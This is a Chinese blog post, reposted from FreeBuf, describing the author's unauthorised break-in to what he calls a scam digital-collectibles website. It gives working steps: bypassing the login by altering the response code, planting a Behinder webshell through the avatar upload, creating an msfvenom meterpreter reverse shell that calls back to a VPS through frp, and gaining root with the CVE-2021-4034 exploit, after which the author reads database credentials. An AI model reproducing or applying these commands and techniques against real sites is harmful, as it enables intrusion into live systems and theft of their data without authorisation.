作者:一点我爱你110, 转载自FreeBuf.COM
这是一个主打数字藏品的网站元宇宙妥妥的割韭菜,关于这个网站也是无意间找到的。![]()
看起来非常假的网站这个网站是没有cdn的用的是thinkphpk框架搭建的。![]()
![]()
![]()
一个开源的cms还没有验证码尝试用burp进行爆破,首先在火狐上设置代理ip为127.0.0.1代理端口为8081。![]()
Burp上也要设置端口为8081,将Intercept设置为on输入账号密码点击登录就能拦截到数据包。![]()
![]()
在爆破之前先发送到Repeater模块发送看看反应。![]()
用户不存在返回code为1的响应码,尝试拦截返回包把1改为0。![]()
成功登录后台,这应该是个前端js验证非常的不安全。![]()
尝试找上传点,点击用户管理-编辑-上传头像,上传一张jpg文件在用burp抓包改为php将内容改为冰蝎马。![]()
想办法上线到msf提权,这里就使用frp内网穿透,在我的vps开启frp。![]()
设置配置文件将8000端口的流量转到kali的6666端口。![]()
![]()
msfvenom -p linux/x64/meterpreter/reverse_tcp LHOST=**** LPORT=8000 -f elf > shell.elf这里的lhost 应为服务器地址 LPORT 为反向代理端口,将shell.elf上传到/www/wwwroot/目录设置权限为777。![]()
use exploit/multi/handlerset payload linux/x64/meterpreter/reverse_tcpset lhost 127.0.0.1set lport 6666exploit
![]()
![]()
使用模块run post/multi/recon/local_exploit_suggester进行漏洞查询。![]()
使用cve-2021-4034提权,切换到linux shell下面然后进到/tmp目录下下载脚本。git clone https://github.com/berdav/CVE-2021-4034.git![]()
upload /home/kali/Desktop/CVE-2021-4034 /tmp/进入shellcd /tmpmakechmod 777 cve-2021-4034./cve-2021-4034
![]()
查看database.php文件链接数据库发现基本上也没有人充值,看到一个账号40w的就是这家所谓数字藏品公司的老总。![]()
登进入尝试提现均提示账户金额异常看来是跑路了,加了它们的官方群进入一看全是讨钱的在这里提醒一下各位这种所谓的数字藏品都是骗局根本提不出来钱的。![]()
文章来源: http://mp.weixin.qq.com/s?__biz=Mzg3Mjc0MDQ2Nw==&mid=2247489409&idx=2&sn=4d268850996526099d5d18c20ff24993&chksm=ceebf49df99c7d8b15090027327c42d668b3aa3085aae22adb3a88acb78d6724ae5f541077c3#rd
如有侵权请联系:admin#unsafe.sh